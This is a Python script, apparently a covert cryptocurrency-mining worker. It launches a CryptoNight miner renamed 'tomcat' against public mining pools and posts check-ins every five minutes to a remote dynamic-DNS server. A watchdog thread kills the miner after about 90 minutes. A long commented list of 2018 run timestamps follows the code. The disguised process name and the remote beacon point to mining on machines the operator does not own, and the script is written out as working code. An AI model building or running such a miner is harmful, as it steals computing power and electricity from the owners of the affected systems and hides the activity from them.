import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:26:01.361000
#2018-02-17 16:12:05.213641
#2018-02-17 18:01:06.646798
#2018-02-17 19:51:04.175341
#2018-02-17 21:38:06.241643
#2018-02-17 23:22:07.163098
#2018-02-18 01:11:03.454445
#2018-02-18 02:57:07.572106
#2018-02-18 04:47:06.330240
#2018-02-18 06:39:01.392131
#2018-02-18 08:28:01.696172
#2018-02-18 10:15:05.426526
#2018-02-18 12:01:06.696950
#2018-02-18 13:45:09.890456
#2018-02-18 15:36:03.923270
#2018-02-18 17:23:06.098519
#2018-02-18 19:12:01.492124
#2018-02-18 21:00:07.707647
#2018-02-18 22:45:07.662727
#2018-02-19 00:34:06.488275
#2018-02-19 02:19:05.930961
#2018-02-19 04:06:07.760959
#2018-02-19 05:50:06.654232
#2018-02-19 07:40:04.508732
#2018-02-19 09:29:02.227385
#2018-02-19 11:18:04.034074
#2018-02-19 13:06:04.831311
#2018-02-19 14:54:06.319658
#2018-02-19 16:41:06.756889
#2018-02-19 18:27:10.796966
#2018-02-19 20:16:02.116778
#2018-02-19 22:05:01.524338
#2018-02-19 23:51:01.476693
#2018-02-20 01:38:04.501750
#2018-02-20 03:26:04.014782
#2018-02-20 05:13:06.254769
#2018-02-20 06:57:04.125133
#2018-02-20 08:44:02.054854
#2018-02-20 10:28:07.608489
#2018-02-20 12:13:06.089044
#2018-02-20 14:00:11.346975
#2018-02-20 15:46:11.504437
#2018-02-20 17:34:05.408187
#2018-02-20 19:21:06.556367
#2018-02-20 21:10:09.693229
#2018-02-20 22:55:08.132087
#2018-02-21 00:38:03.919343
#2018-02-21 02:25:07.756544
#2018-02-21 04:11:01.238326
#2018-02-21 05:57:05.833620
#2018-02-21 07:45:08.711199
#2018-02-21 09:32:08.419561
#2018-02-21 11:20:07.070153
#2018-02-21 13:09:05.026005
#2018-02-21 14:56:04.155244
#2018-02-21 16:44:07.285608
#2018-02-21 18:37:04.242765
#2018-02-21 20:22:03.583140
#2018-02-21 22:10:04.208249
#2018-02-21 23:57:07.143714
#2018-02-22 01:46:01.748743
#2018-02-22 03:33:07.979062
#2018-02-22 05:21:06.706379
#2018-02-22 07:05:05.439982
#2018-02-22 08:51:05.434520
#2018-02-22 10:39:06.191584
#2018-02-22 12:26:04.280264
#2018-02-22 14:10:12.723008
#2018-02-22 15:57:12.560582
#2018-02-22 17:43:05.542251
#2018-02-22 19:29:07.090209
#2018-02-22 21:21:05.682342
#2018-02-22 23:06:07.512810
#2018-02-23 00:54:05.617179
#2018-02-23 02:43:01.838974
#2018-02-23 04:32:01.832026
#2018-02-23 06:18:02.012799
#2018-02-23 08:04:06.069511
#2018-02-23 10:21:05.601165
#2018-02-23 12:13:07.735271
#2018-02-23 13:59:05.897707
#2018-02-23 15:52:10.453773
#2018-02-23 17:37:03.803814
#2018-02-23 19:23:04.872025
#2018-02-23 21:07:06.817391
#2018-02-23 22:53:01.259914
#2018-02-24 01:11:06.236193
#2018-02-24 03:03:05.350681
#2018-02-24 04:49:03.755437
#2018-02-24 06:35:07.973621
#2018-02-24 08:24:01.518406
#2018-02-24 10:12:03.288321
#2018-02-24 12:06:06.604571
#2018-02-24 13:54:01.212456
#2018-02-24 15:43:03.565671
#2018-02-24 17:36:06.838635
#2018-02-24 19:22:08.187793
#2018-02-24 21:59:01.747403
#2018-02-25 02:36:06.330853
#2018-02-25 06:19:02.067759
#2018-02-25 11:40:07.008575